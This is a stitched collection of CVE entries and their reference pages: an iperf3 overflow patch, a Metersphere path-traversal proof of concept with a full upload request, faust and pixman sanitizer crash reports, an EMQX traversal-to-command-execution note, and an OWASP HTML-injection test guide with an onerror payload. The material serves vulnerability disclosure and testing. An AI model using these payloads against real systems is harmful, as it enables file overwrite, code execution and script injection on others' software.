iperf3 before 3.14 allows peers to cause an integer overflow and heap corruption via a crafted length field.

Expand Up

@@ -2670,6 +2670,7 @@ static cJSON \*

JSON\_read(int fd)

{

uint32\_t hsize, nsize;

size\_t strsize;

char \*str;

cJSON \*json \= NULL;

int rc;

Expand All

@@ -2682,7 +2683,9 @@ JSON\_read(int fd)

if (Nread(fd, (char\*) &nsize, sizeof(nsize), Ptcp) >= 0) {

hsize \= ntohl(nsize);

/\* Allocate a buffer to hold the JSON \*/

str \= (char \*) calloc(sizeof(char), hsize+1); /\* +1 for trailing null \*/

strsize \= hsize + 1; /\* +1 for trailing NULL \*/

if (strsize) {

str \= (char \*) calloc(sizeof(char), strsize);

if (str != NULL) {

rc \= Nread(fd, str, hsize, Ptcp);

if (rc >= 0) {

Expand All

@@ -2701,6 +2704,10 @@ JSON\_read(int fd)

}

}

free(str);

}

else {

printf("WARNING: Data length overflow\\n");

}

}

return json;

}

Expand Down

CVE-2023-38403: Fix memory allocation hazard (#1542). (#1543) · esnet/iperf@0ef1515

Progress Chef Infra Server before 15.7 allows a local attacker to exploit a /var/opt/opscode/local-mode-cache/backup world-readable temporary backup path to access sensitive information, resulting in the disclosure of all indexed node data, because OpenSearch credentials are exposed. (The data typically includes credentials for additional systems.) The attacker must wait for an admin to run the "chef-server-ctl reconfigure" command.

CVE-2023-28864: Chef Infra Server Release Notes

Metersphere is an opensource testing framework. Files uploaded to Metersphere may define a `belongType` value with a relative path like `../../../../` which may cause metersphere to attempt to overwrite an existing file in the defined location or to create a new file. Attackers would be limited to overwriting files that the metersphere process has access to. This issue has been addressed in version 2.10.3. Users are advised to upgrade. There are no known workarounds for this vulnerability.

**Summary**

metersphere 由于只检查了文件名，忘记检查文件类型，导致路径穿越。

**POC**

POC: https://1drv.ms/v/s!Avwg5C1eKVA4gl3LF2hgRyVNrSqk?e=DHbHKF

1、找到测试用例中的上传附件的按钮  
2、上传一个附件  
3、拦截请求，

POST /track/attachment/testcase/upload HTTP/1.1  
Host: 192.168.213.128:8081  
Content-Length: 381  
Accept-Language: zh-CN  
WORKSPACE: ed18cee8-2004-4bf1-b112-0070bc03b270  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAv1vklOIsjcjAyZ7  
Accept: application/json, text/plain, _/_  
CSRF-TOKEN: PpGjvIYb9h+d3ui4XudsF0lKJ9oUMhPVBGIkOzibaLIfhzPrKVb0YQLLHByaPGP8pZeHZ1VwtciGzO528axH8g==  
X-AUTH-TOKEN: a84e0cf1-05a7-4627-8129-0bc264dc694d  
PROJECT: a815f3f2-57be-47f4-8351-56a5c643c0de  
Origin: http://192.168.213.128:8081  
Referer: http://192.168.213.128:8081/  
Accept-Encoding: gzip, deflate  
Cookie: \_\_stripe\_mid=f2258077-6e3a-4225-8013-a67c38c075f2242a35; step\_dashboard=true; step\_client\_index=true; privacy-options=6/12/2023|technical|statistical|external  
Connection: close

\------WebKitFormBoundaryAv1vklOIsjcjAyZ7  
Content-Disposition: form-data; name="file"; filename="tmp2hyh.txt"  
Content-Type: text/plain

tmp2  
\------WebKitFormBoundaryAv1vklOIsjcjAyZ7  
Content-Disposition: form-data; name="request"; filename="blob"  
Content-Type: application/json

{"belongId":"","belongType":"../../../../../../"}  
\------WebKitFormBoundaryAv1vklOIsjcjAyZ7--

4、我们发现修改belongType为../../../../../../就可以达到路径穿越的目的

5 我们看了一下代码，如下，uploadAttachment 检查了BelongType是否等于ISSUE以及TEST\_CASE。如果都不是，就直接在函数saveAttachment中使用BelongType作为文件名的一部分，导致路径穿越。  

**Impact**

任意文件覆盖，甚至可以达到任意代码执行

CVE-2023-37461: metersphere 存在路径穿越漏洞

faust commit ee39a19 was discovered to contain a stack overflow via the component boxppShared::print() at /boxes/ppbox.cpp.

Hi, developers of faust:  
In the test of the binary faust instrumented with ASAN. There is a stack-overflow vulnerability in /build/bin/faust, /faust/compiler/boxes/ppbox.cpp:401 in boxppShared::print(std::ostream&) const. Here is the ASAN mode output (I omit some repeated messages):

\=================================================================  
\==45152==ERROR: AddressSanitizer: stack-overflow on address 0x7f14949f7420 (pc 0x0000006aeaaa bp 0x7f1494a00bb0 sp 0x7f14949f7420 T1)  
#0 0x6aeaaa in boxppShared::print(std::ostream&) const /faust/compiler/boxes/ppbox.cpp:401  
#1 0x6d9c0b in operator<<(std::ostream&, boxpp const&) /faust/compiler/boxes/ppbox.hh:64:16  
#2 0x6d9c0b in streambinopShared(std::ostream&, CTree\*, char const\*, CTree\*, int, int) /faust/compiler/boxes/ppbox.cpp:120:10  
#3 0x6b569e in boxppShared::print(std::ostream&) const /faust/compiler/boxes/ppbox.cpp:482:9  
#4 0x6d9c0b in operator<<(std::ostream&, boxpp const&) /faust/compiler/boxes/ppbox.hh:64:16  
#5 0x6d9c0b in streambinopShared(std::ostream&, CTree\*, char const\*, CTree\*, int, int) /faust/compiler/boxes/ppbox.cpp:120:10  
#6 0x6b74ee in boxppShared::print(std::ostream&) const /faust/compiler/boxes/ppbox.cpp:488:9  
#7 0x6d9c0b in operator<<(std::ostream&, boxpp const&) /faust/compiler/boxes/ppbox.hh:64:16  
SUMMARY: AddressSanitizer: stack-overflow /faust/compiler/boxes/ppbox.cpp:401 in boxppShared::print(std::ostream&) const  
Thread T1 created by T0 here:  
#0 0x61127a in pthread\_create (/faust/build/bin/faust+0x61127a)  
#1 0xbaae26 in callFun(void\* (_)(void_), void\*) /faust/compiler/global.cpp:2225:5  
#2 0xc41570 in createFactory(std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&, std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&, int, char const\*\*, std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator >&, bool) /faust/compiler/libcode.cpp:1321:5  
#3 0xc52100 in main /faust/compiler/main.cpp:46:33  
#4 0x7f1498d2dc86 in \_\_libc\_start\_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310

\==45152==ABORTING

**Crash input**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/faust/stack-overflow

**Validation steps**

cmake . -DCMAKE\_CXX\_FLAGS="-fsanitize=address -g" -DCMAKE\_C\_FLAGS="-fsanitize=address -g" -DCMAKE\_EXE\_LINKER\_FLAGS="-fsanitize=address" -DINCLUDE\_STATIC=on -DINCLUDE\_HTTP=off -DINCLUDE\_OSC=off  
make -j  
./build/bin/faust -lang ocpp -o /tmp/faust -e -lcc -exp10 -lb -rb -mem -sd @@

**Environment**

Ubuntu 16.04  
Clang 10.0.1  
gcc 5.5

CVE-2023-37770: A stack-overflow vulnerability in faust · Issue #922 · grame-cncm/faust

stress-test master commit e4c878 was discovered to contain a FPE vulnerability via the component combine_inner at /pixman-combine-float.c.

Hi, developers of pixman: In the test of the binary pixman instrumented with ASAN. There is an FPE vulnerability in stress-test on the master branch. I feed the picture provided in the demos.

Here is the ASAN mode output:

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==18520==ERROR: AddressSanitizer: FPE on unknown address 0x0000006b07cc (pc 0x0000006b07cc bp 0x7ffe8744a4d0 sp 0x7ffe8744a470 T0)
        #0 0x6b07cc in combine_inner /pixman/pixman/pixman-combine-float.c
        #1 0x6b07cc in combine_conjoint_atop_u_float /pixman/pixman/pixman-combine-float.c:313:1
        #2 0x5ce158 in general_composite_rect /pixman/pixman/pixman-general.c:230:2
        #3 0x4e2749 in pixman_image_composite32 /pixman/pixman/pixman.c:700:2
        #4 0x4c8352 in run_test /pixman/test/stress-test.c:966:13
        #5 0x4c669d in main /pixman/test/stress-test.c:1074:6
        #6 0x7f3323dd6c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
        #7 0x41c639 in _start (/pixman/test/stress-test+0x41c639)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: FPE /pixman/pixman/pixman-combine-float.c in combine_inner
    ==18520==ABORTING

**Crash input**

/pixman/demos/zone\_plate.png

**Environment**

Ubuntu 16.04

Clang 10.0.1

gcc 5.5

Edited Jul 04, 2023 by

CVE-2023-37769: FPE in stress-test (#76) · Issues · Pixman / pixman · GitLab

An issue in the emqx_sn plugin of EMQX v4.3.8 allows attackers to execute a directory traversal via uploading a crafted .txt file.

**What happened?**

Path travelsal is existing in HTTP api POST http://xxx.xxx.xxx.xxx:xxx/api/v4/data/file/  
if the filename parameter is ../../../test, the attacker could write malicious file anywhere, to investigate it deeply, if the plugin schema file was replaced, while "os:cmd("echo 12345678 > hacked.txt")" can be added, then attacker can execute malicious command by click the plugin load button or trigger related http api.

Of course attacker should login to the dashboard first. It could be came true if someone use a weak password or old version default password is used.

**What did you expect to happen?**

fix the path travelsal issue

**How can we reproduce it (as minimally and precisely as possible)?**

_No response_

**Anything else we need to know?**

_No response_

**EMQX version**

$ ./bin/emqx\_ctl broker
ALL VERSION!!!

**OS version**

\# On Linux:
$ cat /etc/os-release
# paste output here
$ uname -a
# paste output here

# On Windows:
C:\\> wmic os get Caption, Version, BuildNumber, OSArchitecture
# paste output here

**Log files**

CVE-2023-37781: a security issue was found · Issue #10419 · emqx/emqx

An issue was discovered in ngiflib 0.4. There is SEGV in SDL_LoadAnimatedGif when use SDLaffgif. poc : ./SDLaffgif CA_file2_0

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-30858: SDL_LoadAnimatedGif SEGV · Issue #22 · miniupnp/ngiflib

Furukawa 423-41W/AC before v1.1.4 and LD421-21W before v1.3.3 were discovered to contain an HTML injection vulnerability via the serial number update function.

**Testing for HTML Injection**

ID

WSTG-CLNT-03

**Summary**

HTML injection is a type of injection vulnerability that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page. This vulnerability can have many consequences, like disclosure of a user’s session cookies that could be used to impersonate the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims.

This vulnerability occurs when user input is not correctly sanitized and the output is not encoded. An injection allows the attacker to send a malicious HTML page to a victim. The targeted browser will not be able to distinguish (trust) legitimate parts from malicious parts of the page, and consequently will parse and execute the whole page in the victim’s context.

There is a wide range of methods and attributes that could be used to render HTML content. If these methods are provided with an untrusted input, then there is an high risk of HTML injection vulnerability. For example, malicious HTML code can be injected via the innerHTML JavaScript method, usually used to render user-inserted HTML code. If strings are not correctly sanitized, the method can enable HTML injection. A JavaScript function that can be used for this purpose is document.write().

The following example shows a snippet of vulnerable code that allows an unvalidated input to be used to create dynamic HTML in the page context:

    var userposition=location.href.indexOf("user=");
    var user=location.href.substring(userposition+5);
    document.getElementById("Welcome").innerHTML=" Hello, "+user;
    

The following example shows vulnerable code using the document.write() function:

    var userposition=location.href.indexOf("user=");
    var user=location.href.substring(userposition+5);
    document.write("<h1>Hello, " + user +"</h1>");
    

In both examples, this vulnerability can be exploited with an input such as:

    http://vulnerable.site/page.html?user=<img%20src='aaa'%20onerror=alert(1)>
    

This input will add an image tag to the page that will execute arbitrary JavaScript code inserted by the malicious user in the HTML context.

**Test Objectives**

*   Identify HTML injection points and assess the severity of the injected content.

**How to Test**

Consider the following DOM XSS exercise http://www.domxss.com/domxss/01\_Basics/06\_jquery\_old\_html.html

The HTML code contains the following script:

    <script src="../js/jquery-1.7.1.js"></script>
    <script>
    function setMessage(){
        var t=location.hash.slice(1);
        $("div[id="+t+"]").text("The DOM is now loaded and can be manipulated.");
    }
    $(document).ready(setMessage  );
    $(window).bind("hashchange",setMessage)
    </script>
    <body>
        <script src="../js/embed.js"></script>
        <span><a href="#message" > Show Here</a><div id="message">Showing Message1</div></span>
        <span><a href="#message1" > Show Here</a><div id="message1">Showing Message2</div>
        <span><a href="#message2" > Show Here</a><div id="message2">Showing Message3</div>
    </body>
    

It is possible to inject HTML code.

CVE-2021-37386: WSTG - Latest | OWASP Foundation

TOTOLINK CP300+ V5.2cu.7594 contains a Denial of Service vulnerability in function RebootSystem of the file lib/cste_modules/system which can reboot the system.

CVE-2023-34669

The configuration parser fails to sanitize user-controlled input in the Zyxel ATP series firmware versions 5.10 through 5.36, USG FLEX series firmware versions 5.00 through 5.36,  USG FLEX 50(W) series firmware versions 5.10 through 5.36, 

USG20(W)-VPN series firmware versions 5.10 through 5.36, and VPN series firmware versions 5.00 through 5.36. An unauthenticated, LAN-based attacker could leverage the vulnerability to inject some operating system (OS) commands into the device configuration data on an affected device when the cloud management mode is enabled.

Source

CVE